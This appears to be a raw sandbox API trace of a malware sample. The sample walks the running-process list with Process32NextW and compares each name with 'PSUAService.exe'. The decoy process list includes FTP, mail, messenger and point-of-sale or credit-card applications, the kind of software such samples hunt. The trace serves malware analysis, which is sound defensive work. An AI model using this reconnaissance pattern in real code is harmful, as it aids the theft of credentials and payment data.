cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="according.exe")) returned 1 [0174.147] lstrcmpiW (lpString1="according.exe", lpString2="PSUAService.exe") returned -1 [0174.147] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="areaspaceanother.exe")) returned 1 [0174.148] lstrcmpiW (lpString1="areaspaceanother.exe", lpString2="PSUAService.exe") returned -1 [0174.148] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="weight-employee.exe")) returned 1 [0174.150] lstrcmpiW (lpString1="weight-employee.exe", lpString2="PSUAService.exe") returned 1 [0174.150] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cellresource.exe")) returned 1 [0174.150] lstrcmpiW (lpString1="cellresource.exe", lpString2="PSUAService.exe") returned -1 [0174.150] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="firm_against_member.exe")) returned 1 [0174.151] lstrcmpiW (lpString1="firm_against_member.exe", lpString2="PSUAService.exe") returned -1 [0174.151] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x574, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="listen_art.exe")) returned 1 [0174.152] lstrcmpiW (lpString1="listen_art.exe", lpString2="PSUAService.exe") returned -1 [0174.152] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="animallikely.exe")) returned 1 [0174.153] lstrcmpiW (lpString1="animallikely.exe", lpString2="PSUAService.exe") returned -1 [0174.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strategy-approach-thousand.exe")) returned 1 [0174.153] lstrcmpiW (lpString1="strategy-approach-thousand.exe", lpString2="PSUAService.exe") returned 1 [0174.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsibility.exe")) returned 1 [0174.154] lstrcmpiW (lpString1="responsibility.exe", lpString2="PSUAService.exe") returned 1 [0174.154] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xed0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sea.exe")) returned 1 [0174.156] lstrcmpiW (lpString1="sea.exe", lpString2="PSUAService.exe") returned 1 [0174.156] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen_sea_answer.exe")) returned 1 [0174.156] lstrcmpiW (lpString1="kitchen_sea_answer.exe", lpString2="PSUAService.exe") returned -1 [0174.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="official.exe")) returned 1 [0174.157] lstrcmpiW (lpString1="official.exe", lpString2="PSUAService.exe") returned -1 [0174.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="southern_who_police.exe")) returned 1 [0174.158] lstrcmpiW (lpString1="southern_who_police.exe", lpString2="PSUAService.exe") returned 1 [0174.158] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="administration somebody few.exe")) returned 1 [0174.159] lstrcmpiW (lpString1="administration somebody few.exe", lpString2="PSUAService.exe") returned -1 [0174.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="white_effort_certain.exe")) returned 1 [0174.160] lstrcmpiW (lpString1="white_effort_certain.exe", lpString2="PSUAService.exe") returned 1 [0174.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x424, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="test_two.exe")) returned 1 [0174.161] lstrcmpiW (lpString1="test_two.exe", lpString2="PSUAService.exe") returned 1 [0174.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="watch reveal.exe")) returned 1 [0174.161] lstrcmpiW (lpString1="watch reveal.exe", lpString2="PSUAService.exe") returned 1 [0174.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="restratedegree.exe")) returned 1 [0174.162] lstrcmpiW (lpString1="restratedegree.exe", lpString2="PSUAService.exe") returned 1 [0174.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sign_he.exe")) returned 1 [0174.163] lstrcmpiW (lpString1="sign_he.exe", lpString2="PSUAService.exe") returned 1 [0174.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0174.163] lstrcmpiW (lpString1="3dftp.exe", lpString2="PSUAService.exe") returned -1 [0174.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0174.164] lstrcmpiW (lpString1="absolutetelnet.exe", lpString2="PSUAService.exe") returned -1 [0174.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0174.165] lstrcmpiW (lpString1="alftp.exe", lpString2="PSUAService.exe") returned -1 [0174.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0174.166] lstrcmpiW (lpString1="barca.exe", lpString2="PSUAService.exe") returned -1 [0174.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0174.167] lstrcmpiW (lpString1="bitkinex.exe", lpString2="PSUAService.exe") returned -1 [0174.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0174.170] lstrcmpiW (lpString1="coreftp.exe", lpString2="PSUAService.exe") returned -1 [0174.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0174.171] lstrcmpiW (lpString1="far.exe", lpString2="PSUAService.exe") returned -1 [0174.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0174.172] lstrcmpiW (lpString1="filezilla.exe", lpString2="PSUAService.exe") returned -1 [0174.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0174.173] lstrcmpiW (lpString1="flashfxp.exe", lpString2="PSUAService.exe") returned -1 [0174.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0174.174] lstrcmpiW (lpString1="fling.exe", lpString2="PSUAService.exe") returned -1 [0174.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0174.175] lstrcmpiW (lpString1="gmailnotifierpro.exe", lpString2="PSUAService.exe") returned -1 [0174.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0174.176] lstrcmpiW (lpString1="icq.exe", lpString2="PSUAService.exe") returned -1 [0174.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0174.178] lstrcmpiW (lpString1="leechftp.exe", lpString2="PSUAService.exe") returned -1 [0174.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0174.179] lstrcmpiW (lpString1="ncftp.exe", lpString2="PSUAService.exe") returned -1 [0174.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0174.181] lstrcmpiW (lpString1="notepad.exe", lpString2="PSUAService.exe") returned -1 [0174.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0174.182] lstrcmpiW (lpString1="operamail.exe", lpString2="PSUAService.exe") returned -1 [0174.182] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0174.183] lstrcmpiW (lpString1="outlook.exe", lpString2="PSUAService.exe") returned -1 [0174.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0174.184] lstrcmpiW (lpString1="pidgin.exe", lpString2="PSUAService.exe") returned -1 [0174.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0174.185] lstrcmpiW (lpString1="scriptftp.exe", lpString2="PSUAService.exe") returned 1 [0174.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0174.187] lstrcmpiW (lpString1="skype.exe", lpString2="PSUAService.exe") returned 1 [0174.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0174.188] lstrcmpiW (lpString1="smartftp.exe", lpString2="PSUAService.exe") returned 1 [0174.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0174.189] lstrcmpiW (lpString1="thunderbird.exe", lpString2="PSUAService.exe") returned 1 [0174.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0174.190] lstrcmpiW (lpString1="trillian.exe", lpString2="PSUAService.exe") returned 1 [0174.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0174.191] lstrcmpiW (lpString1="webdrive.exe", lpString2="PSUAService.exe") returned 1 [0174.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0174.192] lstrcmpiW (lpString1="whatsapp.exe", lpString2="PSUAService.exe") returned 1 [0174.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0174.193] lstrcmpiW (lpString1="winscp.exe", lpString2="PSUAService.exe") returned 1 [0174.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0174.194] lstrcmpiW (lpString1="yahoomessenger.exe", lpString2="PSUAService.exe") returned 1 [0174.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0174.195] lstrcmpiW (lpString1="active-charge.exe", lpString2="PSUAService.exe") returned -1 [0174.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0174.196] lstrcmpiW (lpString1="accupos.exe", lpString2="PSUAService.exe") returned -1 [0174.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0174.197] lstrcmpiW (lpString1="afr38.exe", lpString2="PSUAService.exe") returned -1 [0174.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0174.198] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="PSUAService.exe") returned -1 [0174.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1100, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0174.199] lstrcmpiW (lpString1="ccv_server.exe", lpString2="PSUAService.exe") returned -1 [0174.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stocklastmiddle.exe")) returned 1 [0174.200] lstrcmpiW (lpString1="stocklastmiddle.exe", lpString2="PSUAService.exe") returned 1 [0174.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whom_only.exe")) returned 1 [0174.201] lstrcmpiW (lpString1="whom_only.exe", lpString2="PSUAService.exe") returned 1 [0174.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="size-defense-course.exe")) returned 1 [0174.202] lstrcmpiW (lpString1="size-defense-course.exe", lpString2="PSUAService.exe") returned 1 [0174.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="contain.exe")) returned 1 [0174.203] lstrcmpiW (lpString1="contain.exe", lpString2="PSUAService.exe") returned -1 [0174.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0174.210] lstrcmpiW (lpString1="utg2.exe", lpString2="PSUAService.exe") returned 1 [0174.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0174.211] lstrcmpiW (lpString1="spgagentservice.exe", lpString2="PSUAService.exe") returned 1 [0174.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0174.212] lstrcmpiW (lpString1="spcwin.exe", lpString2="PSUAService.exe") returned 1 [0174.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0174.213] lstrcmpiW (lpString1="omnipos.exe", lpString2="PSUAService.exe") returned -1 [0174.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0174.214] lstrcmpiW (lpString1="mxslipstream.exe", lpString2="PSUAService.exe") returned -1 [0174.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0174.215] lstrcmpiW (lpString1="isspos.exe", lpString2="PSUAService.exe") returned -1 [0174.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0174.216] lstrcmpiW (lpString1="fpos.exe", lpString2="PSUAService.exe") returned -1 [0174.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0174.217] lstrcmpiW (lpString1="edcsvr.exe", lpString2="PSUAService.exe") returned -1 [0174.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0174.217] lstrcmpiW (lpString1="creditservice.exe", lpString2="PSUAService.exe") returned -1 [0174.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0174.218] lstrcmpiW (lpString1="centralcreditcard.exe", lpString2="PSUAService.exe") returned -1 [0174.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x78c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0174.219] lstrcmpiW (lpString1="aldelo.exe", lpString2="PSUAService.exe") returned -1 [0174.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x18a154 | out: lppe=0x18a154*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0174.220] lstrcmpiW (lpString1="iexplore.exe", lpString2="PSUAService.exe") returned -1 